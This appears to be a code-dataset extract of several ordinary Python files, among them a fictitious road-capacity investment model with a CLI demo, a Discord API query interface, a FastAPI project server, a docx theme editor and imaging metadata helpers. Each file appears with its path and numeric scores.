parser.add_argument('--uncs', type=str, default="uncs.yml", help='Uncertainties Yaml File')
parser.add_argument('--no-random-crashes', action='store_true', help='disable random crashes')
args = parser.parse_args()
import logging
logger = logging.getLogger('emat.RoadTest')
file_handler = logging.FileHandler("emat-road-test.log")
file_handler.setLevel(10)
LOG_FORMAT = '[%(asctime)s] %(name)s.%(levelname)s: %(message)s'
file_handler.setFormatter(logging.Formatter(LOG_FORMAT))
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setLevel(20)
console_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.setLevel(10)
logger.info("running emat-road-test-demo")
logger.debug(str(args))
logger.debug(str(os.getcwd()))
import yaml
if os.path.exists(args.levers):
with open(args.levers, 'rt') as f:
levers = yaml.safe_load(f)
else:
levers = {'mandatory_unused_lever':42}
if os.path.exists(args.uncs):
with open(args.uncs, 'rt') as f:
uncs = yaml.safe_load(f)
else:
uncs = {}
if 'mandatory_unused_lever' not in levers:
raise ValueError("missing 'mandatory_unused_lever'")
if levers['mandatory_unused_lever'] != 42:
raise ValueError("incorrect value for 'mandatory_unused_lever', must be 42")
if 'unit_cost_expansion' in uncs:
raise ValueError("cannot give 'unit_cost_expansion', use 'labor_unit_cost_expansion' and 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) <= uncs.get('materials_unit_cost_expansion', 0):
raise ValueError("'labor_unit_cost_expansion' cannot be less than or equal 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) > uncs.get('materials_unit_cost_expansion', 0)*2:
raise ValueError("'labor_unit_cost_expansion' cannot be more than double 'materials_unit_cost_expansion'")
unit_cost_expansion = uncs.pop('labor_unit_cost_expansion', 0) + uncs.pop('materials_unit_cost_expansion', 0)
uncs['unit_cost_expansion'] = unit_cost_expansion
# (pseudo)random crash
if not args.no_random_crashes:
if 'expand_capacity' in levers and levers['expand_capacity'] > 90 and not os.path.exists('prevent_random_crash.txt'):
with open('prevent_random_crash.txt', 'wt') as f:
f.write("this file will prevent random crashes in `emat-road-test-demo`")
logger.error("Random crash, ha ha!")
sys.exit(-9)
try:
for k,v in levers.items():
logger.debug(f"lever: {k} = {v}")
for k,v in uncs.items():
logger.debug(f"uncertainty: {k} = {v}")
result = Road_Capacity_Investment(**levers, **uncs)
for k,v in result.items():
logger.debug(f"result: {k} = {v}")
result1 = {str(k):float(result[k]) for k in ['no_build_travel_time','build_travel_time','time_savings']}
result2 = pandas.DataFrame({
'value_of_time_savings': [numpy.exp(result['value_of_time_savings']/1000), numpy.nan],
'present_cost_expansion': [numpy.nan, result['present_cost_expansion']],
'cost_of_capacity_expansion': [numpy.exp(result['cost_of_capacity_expansion']/1000), numpy.nan],
'net_benefits': [numpy.nan,result['net_benefits']],
}, index=['exp','plain'])
with open('output.yaml', 'wt') as f:
yaml.safe_dump(result1, f)
result2.to_csv('output.csv.gz')
logger.info("emat-road-test-demo completed without errors")
except:
logger.exception("unintentional crash")
sys.exit(-8) | emat/model/core_python/core_python_examples.py |
import numpy
class Dummy():
def __init__(self):
'''nothing to do here'''
def calc_pm1(self, exp_vars):
return self.__sum_exp_vars(exp_vars)
def calc_pm2(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 2
def calc_pm10(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 10
def calc_pm100(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 100
def __sum_exp_vars(self,ev):
return ev['exp_var 1'] + ev['exp_var 2']
def __call__(self, **kwargs):
return dict(
pm_1=self.calc_pm1(kwargs),
pm_2=self.calc_pm2(kwargs),
pm_10=self.calc_pm10(kwargs),
pm_100=self.calc_pm100(kwargs),
)
def NoisyDummy(**kwargs):
lever1 = kwargs.get('lever1', 0)
lever2 = kwargs.get('lever2', 0)
uncertain1 = kwargs.get('uncertain1', 3)
uncertain2 = numpy.exp(kwargs.get('uncertain2', -0.7))
uncertain3 = numpy.exp(kwargs.get('uncertain3', 0.7))
certain4 = kwargs.get('certain4', 3)
noise_amplitude = kwargs.get('noise_amplitude', 2.0)
noise_frequency = kwargs.get('noise_frequency', 5.0)
pm_1 = (
- uncertain2 * lever1 * lever1
+ (uncertain1 + certain4) * (lever1 + lever2)
+ noise_amplitude * numpy.sin(noise_frequency * lever1)
)
pm_2 = numpy.minimum(
1.11e+111 * uncertain1,
numpy.exp(
uncertain3 * lever1 * (lever1 + lever2)
+ uncertain1 * lever1
+ noise_amplitude * numpy.cos(noise_frequency * lever2)
)
)
pm_3 = (
noise_amplitude * numpy.cos(noise_frequency * lever1)
+ noise_amplitude * numpy.sin(noise_frequency * lever2)
+ certain4
)
pm_4 = numpy.exp(
uncertain1 + certain4
)
return {'pm_1':pm_1, 'pm_2': pm_2, 'pm_3': pm_3, 'pm_4':pm_4}
def Road_Capacity_Investment(
# constant
free_flow_time=60,
initial_capacity=100,
# uncertainty
alpha=0.15,
beta=4.0,
input_flow=100,
value_of_time=0.01,
unit_cost_expansion=1,
interest_rate=0.03,
yield_curve=0.01,
# policy
expand_capacity=10,
amortization_period=30,
interest_rate_lock=False,
debt_type='GO Bond',
lane_width=10,
**kwargs,
):
"""
A fictitious example model for road capacity investment.
This model simulates a capacity expansion investment on a single
network link. The link volume-delay function is governed by the
`BPR function <https://en.wikipedia.org/wiki/Route_assignment#Frank-Wolfe_algorithm>`_.
This model is a bit contrived, because it is designed to explicitly demonstrate
a wide variety of EMAT features in a transportation planning model that is as simple
as possible. For example, the policy levers are structured so that there is one
of each dtype (float, int, bool, and categorical).
Args:
free_flow_time (float, default 60): The free flow travel time on the link.
initial_capacity (float, default 100): The pre-expansion capacity on the link.
alpha (float, default 0.15): Alpha parameter to the BPR volume-delay function.
beta (float, default 4.0): Beta parameter to the BPR volume-delay function.
input_flow (float, default 100): The future input flow on the link.
value_of_time (float, default 0.01): The value of a unit of travel time savings
per unit of flow on the link.
unit_cost_expansion (float, default 1): The present marginal cost of adding one
unit of capacity to the link (assumes no economies of scale on expansion cost)
interest_rate (float, default 0.03): The interest rate actually incurred for
revenue bonds amortized over 15 years. The interest rate for general obligation
bonds is assumed to be 0.0025 less than this value.
yield_curve (float, default 0.01): The marginal increase in the interest_rate if
the amortization period is 50 years instead of 15. The yield curve is assumed
to be linearly projected to all other possible amortization periods
expand_capacity (float, default 10): The amount of capacity expansion actually
constructed.
amortization_period (int, default 30): The time period over which the construction
costs are amortized.
interest_rate_lock (bool, default False): Whether interest rates are locked at
the assumed current rate of 0.03 / 0.01 or allowed to float.
debt_type ('GO Bond', 'Rev Bond', 'Paygo'): Type of financing. General obligation
bonds are assumed to have a lower interest rate than revenue bonds, but
may be politically less desirable. Pay-as-you-go financing incurs no actual
interest costs, but requires actually having the funds available.
lane_width (float, default 10): The width of lanes on the roadway. This parameter
is intentionally wacky, causing massive congestion for any value other than 10,
to demonstrate what might happen with broken model inputs.
Returns:
dict:
no_build_travel_time
The average travel time on the link if no
capacity expansion was constructed.
build_travel_time
The average travel time on the link after expansion.
time_savings
The average travel time savings as a result of the
expansion.
value_of_time_savings
The total value of the travel time savings,
accounting for the time savings per traveler, the total flow, and
the value of time.
present_cost_expansion
The present cost of building the expansion
cost_of_capacity_expansion
The annual payment to finance the expansion,
when amortized.
net_benefits
The value of the time savings minus the annual payment.
"""
debt_type = debt_type.lower()
assert debt_type in ('go bond', 'paygo', 'rev bond')
average_travel_time0 = free_flow_time * (1 + alpha*(input_flow/initial_capacity)**beta)
capacity = initial_capacity + expand_capacity
average_travel_time1 = free_flow_time * (1 + alpha*(input_flow/capacity)**beta)
average_travel_time1 += (numpy.absolute(lane_width-10)*1000)**0.5
travel_time_savings = average_travel_time0 - average_travel_time1
value_of_time_savings = value_of_time * travel_time_savings * input_flow
present_cost_of_capacity_expansion = float(unit_cost_expansion * expand_capacity)
if interest_rate_lock:
interest_rate = 0.03
yield_curve = 0.01
if (debt_type == 'go bond'):
interest_rate -= 0.0025
elif (debt_type == 'paygo'):
interest_rate = 0
effective_interest_rate = interest_rate + yield_curve * (amortization_period-15) / 35
cost_of_capacity_expansion = numpy.pmt(effective_interest_rate,
amortization_period,
present_cost_of_capacity_expansion, )
return dict(
no_build_travel_time=average_travel_time0,
build_travel_time=average_travel_time1,
time_savings=travel_time_savings,
value_of_time_savings=value_of_time_savings,
present_cost_expansion=present_cost_of_capacity_expansion,
cost_of_capacity_expansion=-cost_of_capacity_expansion,
net_benefits = value_of_time_savings + cost_of_capacity_expansion,
)
def _Road_Capacity_Investment_CmdLine():
"""
This is a demo for calling a core model function on the command line.
"""
import argparse, pandas, os, numpy, sys, warnings
parser = argparse.ArgumentParser()
parser.add_argument('--levers', type=str, default='levers.yml', help='Levers Yaml File')
parser.add_argument('--uncs', type=str, default="uncs.yml", help='Uncertainties Yaml File')
parser.add_argument('--no-random-crashes', action='store_true', help='disable random crashes')
args = parser.parse_args()
import logging
logger = logging.getLogger('emat.RoadTest')
file_handler = logging.FileHandler("emat-road-test.log")
file_handler.setLevel(10)
LOG_FORMAT = '[%(asctime)s] %(name)s.%(levelname)s: %(message)s'
file_handler.setFormatter(logging.Formatter(LOG_FORMAT))
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setLevel(20)
console_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.setLevel(10)
logger.info("running emat-road-test-demo")
logger.debug(str(args))
logger.debug(str(os.getcwd()))
import yaml
if os.path.exists(args.levers):
with open(args.levers, 'rt') as f:
levers = yaml.safe_load(f)
else:
levers = {'mandatory_unused_lever':42}
if os.path.exists(args.uncs):
with open(args.uncs, 'rt') as f:
uncs = yaml.safe_load(f)
else:
uncs = {}
if 'mandatory_unused_lever' not in levers:
raise ValueError("missing 'mandatory_unused_lever'")
if levers['mandatory_unused_lever'] != 42:
raise ValueError("incorrect value for 'mandatory_unused_lever', must be 42")
if 'unit_cost_expansion' in uncs:
raise ValueError("cannot give 'unit_cost_expansion', use 'labor_unit_cost_expansion' and 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) <= uncs.get('materials_unit_cost_expansion', 0):
raise ValueError("'labor_unit_cost_expansion' cannot be less than or equal 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) > uncs.get('materials_unit_cost_expansion', 0)*2:
raise ValueError("'labor_unit_cost_expansion' cannot be more than double 'materials_unit_cost_expansion'")
unit_cost_expansion = uncs.pop('labor_unit_cost_expansion', 0) + uncs.pop('materials_unit_cost_expansion', 0)
uncs['unit_cost_expansion'] = unit_cost_expansion
# (pseudo)random crash
if not args.no_random_crashes:
if 'expand_capacity' in levers and levers['expand_capacity'] > 90 and not os.path.exists('prevent_random_crash.txt'):
with open('prevent_random_crash.txt', 'wt') as f:
f.write("this file will prevent random crashes in `emat-road-test-demo`")
logger.error("Random crash, ha ha!")
sys.exit(-9)
try:
for k,v in levers.items():
logger.debug(f"lever: {k} = {v}")
for k,v in uncs.items():
logger.debug(f"uncertainty: {k} = {v}")
result = Road_Capacity_Investment(**levers, **uncs)
for k,v in result.items():
logger.debug(f"result: {k} = {v}")
result1 = {str(k):float(result[k]) for k in ['no_build_travel_time','build_travel_time','time_savings']}
result2 = pandas.DataFrame({
'value_of_time_savings': [numpy.exp(result['value_of_time_savings']/1000), numpy.nan],
'present_cost_expansion': [numpy.nan, result['present_cost_expansion']],
'cost_of_capacity_expansion': [numpy.exp(result['cost_of_capacity_expansion']/1000), numpy.nan],
'net_benefits': [numpy.nan,result['net_benefits']],
}, index=['exp','plain'])
with open('output.yaml', 'wt') as f:
yaml.safe_dump(result1, f)
result2.to_csv('output.csv.gz')
logger.info("emat-road-test-demo completed without errors")
except:
logger.exception("unintentional crash")
sys.exit(-8) | 0.776369 | 0.421135 |
import abc
import typing
class Query(abc.ABC):
__slots__ = ["token", "token_type"]
def __init__(self, token: str, token_type: str):
self.token = token
self.token_type = token_type
@abc.abstractmethod
def channel(self, snonwflake: int) -> typing.Dict:
"""Interface for the REST API query to get channels.
Parameters:
snowflake: int
The channel ID of a Discord channel
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def user(self, snowflake: int) -> typing.Dict:
"""Interface for the REST API query to get user.
Parameters:
snowflake: int
The ID of a Discord User
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def current_user(self) -> typing.Dict:
"""Interface for the REST API query to get current user.
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_me(self, args: dict) -> typing.Dict:
"""Interface for the REST API query to modify current user.
Returns:
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_channel(self, channel_id: int, args: typing.Dict):
"""Interface for the REST API query to modify guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def delete_channel(self, channel_id):
"""Interface for the REST API query to delete guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
"""
@abc.abstractmethod
def leave_guild(self, snowflake: int):
"""Interface for the REST API query to leave a guild.
Returns:
code: int
Code for response status. Will return 204 on success
"""
@abc.abstractmethod
def current_user_dms(self) -> typing.Dict:
"""Interface for the REST API query to fetch current user's DMs list
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def create_dm(self, recipient_id: int) -> typing.Dict:
"""Interface for the REST API query to create a DM with a specific user according to ID
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
""" | zenora/base/query.py | import abc
import typing
class Query(abc.ABC):
__slots__ = ["token", "token_type"]
def __init__(self, token: str, token_type: str):
self.token = token
self.token_type = token_type
@abc.abstractmethod
def channel(self, snonwflake: int) -> typing.Dict:
"""Interface for the REST API query to get channels.
Parameters:
snowflake: int
The channel ID of a Discord channel
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def user(self, snowflake: int) -> typing.Dict:
"""Interface for the REST API query to get user.
Parameters:
snowflake: int
The ID of a Discord User
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def current_user(self) -> typing.Dict:
"""Interface for the REST API query to get current user.
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_me(self, args: dict) -> typing.Dict:
"""Interface for the REST API query to modify current user.
Returns:
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_channel(self, channel_id: int, args: typing.Dict):
"""Interface for the REST API query to modify guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def delete_channel(self, channel_id):
"""Interface for the REST API query to delete guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
"""
@abc.abstractmethod
def leave_guild(self, snowflake: int):
"""Interface for the REST API query to leave a guild.
Returns:
code: int
Code for response status. Will return 204 on success
"""
@abc.abstractmethod
def current_user_dms(self) -> typing.Dict:
"""Interface for the REST API query to fetch current user's DMs list
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def create_dm(self, recipient_id: int) -> typing.Dict:
"""Interface for the REST API query to create a DM with a specific user according to ID
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
""" | 0.805326 | 0.405743 |
"""ASGI server."""
import argparse
import os
import sys
import uvicorn
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse, PlainTextResponse, Response
from projects import __version__, api
from projects.database import init_db
from projects.exceptions import (
BadRequest,
Forbidden,
InternalServerError,
NotFound,
ServiceUnavailable,
)
app = FastAPI(
title="PlatIAgro Projects",
description="These are the docs for PlatIAgro Projects API. The endpoints below are usually accessed by the PlatIAgro Web-UI",
version=__version__,
)
app.include_router(api.projects.router)
app.include_router(api.comparisons.router)
app.include_router(api.experiments.router)
app.include_router(api.experiment_data.router)
app.include_router(api.experiment_operators.router)
app.include_router(api.experiment_runs.router)
app.include_router(api.datasets.router)
app.include_router(api.figures.router)
app.include_router(api.experiment_logs.router)
app.include_router(api.metrics.router)
app.include_router(api.results.router)
app.include_router(api.operator_parameters.router)
app.include_router(api.deployments.router)
app.include_router(api.deployment_operators.router)
app.include_router(api.deployment_runs.router)
app.include_router(api.deployment_logs.router)
app.include_router(api.monitorings.router)
app.include_router(api.monitoring_figures.router)
app.include_router(api.predictions.router)
app.include_router(api.tasks.router)
app.include_router(api.parameters.router)
app.include_router(api.templates.router)
app.include_router(api.responses.router)
app.include_router(api.healthcheck.router)
@app.on_event("startup")
async def startup_event():
"""
Run before the application starts. Creates tables in the database.
"""
init_db()
@app.get("/", response_class=PlainTextResponse)
async def ping():
"""
Handles GET requests to /.
"""
return "pong"
@app.exception_handler(BadRequest)
@app.exception_handler(NotFound)
@app.exception_handler(InternalServerError)
@app.exception_handler(Forbidden)
@app.exception_handler(ServiceUnavailable)
async def handle_errors(request: Request, exception: Exception):
"""
Handles exceptions raised by the API.
Parameters
----------
request : Request
exception : Exception
Returns
-------
JSONResponse
"""
return JSONResponse(
status_code=exception.status_code,
content={
"code": exception.code,
"message": exception.message,
},
)
def enable_cors():
"""
Enables CORS preflight requests.
"""
@app.options("/{rest_of_path:path}")
async def preflight_handler(request: Request, rest_of_path: str) -> Response:
"""
Handles CORS preflight requests.
"""
response = Response()
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
@app.middleware("http")
async def add_cors_header(request: Request, call_next):
"""
Sets CORS headers.
"""
response = await call_next(request)
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
if os.getenv("ENABLE_CORS"):
enable_cors()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Projects API",
)
parser.add_argument(
"--host",
type=str,
default="127.0.0.1",
help="Host for HTTP server (default: 127.0.0.1)",
)
parser.add_argument(
"--port",
type=int,
default=8080,
help="Port for HTTP server (default: 8080)",
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
uvicorn.run(app, host=args.host, port=args.port) | projects/api/main.py | """ASGI server."""
import argparse
import os
import sys
import uvicorn
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse, PlainTextResponse, Response
from projects import __version__, api
from projects.database import init_db
from projects.exceptions import (
BadRequest,
Forbidden,
InternalServerError,
NotFound,
ServiceUnavailable,
)
app = FastAPI(
title="PlatIAgro Projects",
description="These are the docs for PlatIAgro Projects API. The endpoints below are usually accessed by the PlatIAgro Web-UI",
version=__version__,
)
app.include_router(api.projects.router)
app.include_router(api.comparisons.router)
app.include_router(api.experiments.router)
app.include_router(api.experiment_data.router)
app.include_router(api.experiment_operators.router)
app.include_router(api.experiment_runs.router)
app.include_router(api.datasets.router)
app.include_router(api.figures.router)
app.include_router(api.experiment_logs.router)
app.include_router(api.metrics.router)
app.include_router(api.results.router)
app.include_router(api.operator_parameters.router)
app.include_router(api.deployments.router)
app.include_router(api.deployment_operators.router)
app.include_router(api.deployment_runs.router)
app.include_router(api.deployment_logs.router)
app.include_router(api.monitorings.router)
app.include_router(api.monitoring_figures.router)
app.include_router(api.predictions.router)
app.include_router(api.tasks.router)
app.include_router(api.parameters.router)
app.include_router(api.templates.router)
app.include_router(api.responses.router)
app.include_router(api.healthcheck.router)
@app.on_event("startup")
async def startup_event():
"""
Run before the application starts. Creates tables in the database.
"""
init_db()
@app.get("/", response_class=PlainTextResponse)
async def ping():
"""
Handles GET requests to /.
"""
return "pong"
@app.exception_handler(BadRequest)
@app.exception_handler(NotFound)
@app.exception_handler(InternalServerError)
@app.exception_handler(Forbidden)
@app.exception_handler(ServiceUnavailable)
async def handle_errors(request: Request, exception: Exception):
"""
Handles exceptions raised by the API.
Parameters
----------
request : Request
exception : Exception
Returns
-------
JSONResponse
"""
return JSONResponse(
status_code=exception.status_code,
content={
"code": exception.code,
"message": exception.message,
},
)
def enable_cors():
"""
Enables CORS preflight requests.
"""
@app.options("/{rest_of_path:path}")
async def preflight_handler(request: Request, rest_of_path: str) -> Response:
"""
Handles CORS preflight requests.
"""
response = Response()
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
@app.middleware("http")
async def add_cors_header(request: Request, call_next):
"""
Sets CORS headers.
"""
response = await call_next(request)
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
if os.getenv("ENABLE_CORS"):
enable_cors()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Projects API",
)
parser.add_argument(
"--host",
type=str,
default="127.0.0.1",
help="Host for HTTP server (default: 127.0.0.1)",
)
parser.add_argument(
"--port",
type=int,
default=8080,
help="Port for HTTP server (default: 8080)",
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
uvicorn.run(app, host=args.host, port=args.port) | 0.560012 | 0.069605 |
import os
import subprocess
import sys
import tempfile
import uuid
import zipfile
from collections import Iterable
import requests
from defusedxml.lxml import fromstring
from lxml import etree
from pypandoc import get_pandoc_path
from docmaker.hooks import Hook
THEME_COLORS = (
"dk1",
"lt1",
"dk2",
"lt2",
"accent1",
"accent2",
"accent3",
"accent4",
"accent5",
"accent6",
"hlink",
"folHlink",
)
class Theme:
@Hook("pre_convert_to_docx", predicate=(
lambda ctx: ctx.get_options("theme")
))
def update_theme_xml(self, ctx):
if ctx.reference_doc is None:
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
subprocess.run(
[
get_pandoc_path(),
"-o", ctx.reference_doc,
"--print-default-data-file", "reference.docx"
],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with tempfile.TemporaryDirectory(dir=ctx.tmpdir) as tmpdir:
with zipfile.ZipFile(ctx.reference_doc) as zf:
zf.extractall(tmpdir)
styles_xml_file = os.path.join(tmpdir, "word", "styles.xml")
theme_xml_file = os.path.join(tmpdir, "word", "theme", "theme1.xml")
if not os.path.exists(theme_xml_file):
return
with open(styles_xml_file, "rb") as f:
styles_xml = fromstring(f.read())
with open(theme_xml_file, "rb") as f:
theme_xml = fromstring(f.read())
clrScheme = theme_xml.find("a:themeElements/a:clrScheme", namespaces=theme_xml.nsmap)
for color in THEME_COLORS:
if f"theme.color_{color}" not in ctx:
continue
colorValue = ctx[f"theme.color_{color}"]
clr = clrScheme.find(f"a:{color}", namespaces=theme_xml.nsmap)
if clr is None:
raise ValueError(f"{color} is invalid")
if color in ("dk1", "lt1"):
clr = clr.find("a:sysClr", namespaces=theme_xml.nsmap)
attribute_name = "lastClr"
else:
clr = clr.find("a:srgbClr", namespaces=theme_xml.nsmap)
attribute_name = "val"
clr.attrib[attribute_name] = colorValue
for style in styles_xml.findall("w:style", namespaces=styles_xml.nsmap):
clr = style.find("w:rPr/w:color", namespaces=styles_xml.nsmap)
if clr is None:
continue
if clr.get(etree.QName(styles_xml.nsmap["w"], "themeColor")) != color:
continue
clr.set(etree.QName(styles_xml.nsmap["w"], "val"), colorValue)
fontScheme = theme_xml.find("a:themeElements/a:fontScheme", namespaces=theme_xml.nsmap)
if "theme.major_font" in ctx:
latinFont = fontScheme.find("a:majorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.major_font"]
if "theme.minor_font" in ctx:
latinFont = fontScheme.find("a:minorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.minor_font"]
with open(styles_xml_file, "wb") as f:
f.write(etree.tostring(styles_xml, encoding="utf-8", standalone="yes"))
with open(theme_xml_file, "wb") as f:
f.write(etree.tostring(theme_xml, encoding="utf-8", standalone="yes"))
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
with zipfile.ZipFile(ctx.reference_doc, "w") as zf:
def addToZip(path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, zipfile.ZIP_DEFLATED)
elif os.path.isdir(path):
if zippath:
zf.write(path, zippath)
for nm in sorted(os.listdir(path)):
addToZip(os.path.join(path, nm), os.path.join(zippath, nm))
addToZip(tmpdir, "") | docmaker/features/theme.py | import os
import subprocess
import sys
import tempfile
import uuid
import zipfile
from collections import Iterable
import requests
from defusedxml.lxml import fromstring
from lxml import etree
from pypandoc import get_pandoc_path
from docmaker.hooks import Hook
THEME_COLORS = (
"dk1",
"lt1",
"dk2",
"lt2",
"accent1",
"accent2",
"accent3",
"accent4",
"accent5",
"accent6",
"hlink",
"folHlink",
)
class Theme:
@Hook("pre_convert_to_docx", predicate=(
lambda ctx: ctx.get_options("theme")
))
def update_theme_xml(self, ctx):
if ctx.reference_doc is None:
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
subprocess.run(
[
get_pandoc_path(),
"-o", ctx.reference_doc,
"--print-default-data-file", "reference.docx"
],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with tempfile.TemporaryDirectory(dir=ctx.tmpdir) as tmpdir:
with zipfile.ZipFile(ctx.reference_doc) as zf:
zf.extractall(tmpdir)
styles_xml_file = os.path.join(tmpdir, "word", "styles.xml")
theme_xml_file = os.path.join(tmpdir, "word", "theme", "theme1.xml")
if not os.path.exists(theme_xml_file):
return
with open(styles_xml_file, "rb") as f:
styles_xml = fromstring(f.read())
with open(theme_xml_file, "rb") as f:
theme_xml = fromstring(f.read())
clrScheme = theme_xml.find("a:themeElements/a:clrScheme", namespaces=theme_xml.nsmap)
for color in THEME_COLORS:
if f"theme.color_{color}" not in ctx:
continue
colorValue = ctx[f"theme.color_{color}"]
clr = clrScheme.find(f"a:{color}", namespaces=theme_xml.nsmap)
if clr is None:
raise ValueError(f"{color} is invalid")
if color in ("dk1", "lt1"):
clr = clr.find("a:sysClr", namespaces=theme_xml.nsmap)
attribute_name = "lastClr"
else:
clr = clr.find("a:srgbClr", namespaces=theme_xml.nsmap)
attribute_name = "val"
clr.attrib[attribute_name] = colorValue
for style in styles_xml.findall("w:style", namespaces=styles_xml.nsmap):
clr = style.find("w:rPr/w:color", namespaces=styles_xml.nsmap)
if clr is None:
continue
if clr.get(etree.QName(styles_xml.nsmap["w"], "themeColor")) != color:
continue
clr.set(etree.QName(styles_xml.nsmap["w"], "val"), colorValue)
fontScheme = theme_xml.find("a:themeElements/a:fontScheme", namespaces=theme_xml.nsmap)
if "theme.major_font" in ctx:
latinFont = fontScheme.find("a:majorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.major_font"]
if "theme.minor_font" in ctx:
latinFont = fontScheme.find("a:minorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.minor_font"]
with open(styles_xml_file, "wb") as f:
f.write(etree.tostring(styles_xml, encoding="utf-8", standalone="yes"))
with open(theme_xml_file, "wb") as f:
f.write(etree.tostring(theme_xml, encoding="utf-8", standalone="yes"))
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
with zipfile.ZipFile(ctx.reference_doc, "w") as zf:
def addToZip(path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, zipfile.ZIP_DEFLATED)
elif os.path.isdir(path):
if zippath:
zf.write(path, zippath)
for nm in sorted(os.listdir(path)):
addToZip(os.path.join(path, nm), os.path.join(zippath, nm))
addToZip(tmpdir, "") | 0.149904 | 0.061537 |
import numpy as np
import pandas as pd
import hashlib
CHUNK_SIZE = 4096
# Required metadata fields - everything else goes into a json
META_NAMES = ["ChannelIndex",
"Slice",
"FrameIndex",
"Channel",
"FileName",
"PositionIndex"]
DF_NAMES = ["channel_idx",
"slice_idx",
"time_idx",
"channel_name",
"file_name",
"pos_idx",
"sha256"]
def make_dataframe(nbr_frames=None, col_names=DF_NAMES):
"""
Create empty pandas dataframe given indices and column names
:param [None, int] nbr_frames: The number of rows in the dataframe
:param list of strs col_names: The dataframe column names
:return dataframe frames_meta: Empty dataframe with given
indices and column names
"""
if nbr_frames is not None:
# Get metadata and path for each frame
frames_meta = pd.DataFrame(
index=range(nbr_frames),
columns=col_names,
)
else:
frames_meta = pd.DataFrame(columns=col_names)
return frames_meta
def validate_global_meta(global_meta):
"""
Validate that global frames meta dictionary contain all required values.
:param dict global_meta: Global frames metadata
:raise AssertionError: if not all keys are present
"""
keys = ["storage_dir",
"nbr_frames",
"im_width",
"im_height",
"nbr_slices",
"nbr_channels",
"im_colors",
"nbr_timepoints",
"nbr_positions",
"bit_depth"]
keys_valid = np.zeros(len(keys), dtype='bool')
for idx, key in enumerate(keys):
key_valid = (key in global_meta) and \
(global_meta[key] is not None)
keys_valid[idx] = key_valid
assert np.all(keys_valid),\
"Not all required metadata keys are present"
def gen_sha256(image):
"""
Generate the sha-256 hash of an image. If the user
passes in a numpy ndarray (usually a frame), hash the
whole numpy. If the user passes in a file path, the
function will hash the file in 4kB chucks
:param ndarray/String image: ndarray containing the image to hash
or string containing path to file
to hash
:return String sha256: sha-256 hash of the input image
"""
sha = hashlib.sha256()
# If a frame is passed in, hash the numpy array
if isinstance(image, np.ndarray):
sha.update(image.tobytes())
